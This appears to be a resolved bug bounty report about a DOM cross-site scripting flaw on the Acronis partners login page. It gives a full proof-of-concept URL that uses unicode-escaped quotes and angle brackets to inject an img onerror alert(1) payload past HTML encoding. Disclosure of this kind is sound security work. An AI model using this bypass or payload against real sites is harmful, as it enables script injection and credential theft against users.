Loading HuntDB...

XSS on https://partners.acronis.com/

Low
A
Acronis
Submitted None
Reported by yash_

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - DOM
Hello, I found DOM XSS on login page of https://partners.acronis.com/ Open this URL https://partners.acronis.com/en-us/profile/login.html?-back=test123"> and search for `var back =`. Here input is HTML encoded but from that reflected value, element is created and appended to the form. {F983552} We can use JavaScript's unicode escaping to bypass this.. ## Steps To Reproduce 1. For this payload `"><img src=x onerror=alert(1)><x y="` we have to replace `"` with `\u0022`, `>` with `\u003e` and `<` with `\u003c`. So the payload will be `\u0022\u003e\u003cimg src=x onerror=alert(1)\u003e\u003cx y=\u0022` 1. Open this URL ``` https://partners.acronis.com/en-us/profile/login.html?-back=\u0022\u003e\u003cimg+src=x+onerror=alert(1)\u003e\u003cx+y=\u0022 ``` 1. And you'll see alert dialog. {F983553} ## Impact Attacker can execute JavaScript code on users who open the link. This XSS is in the login page so it can be used to get someone's credentials..

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - DOM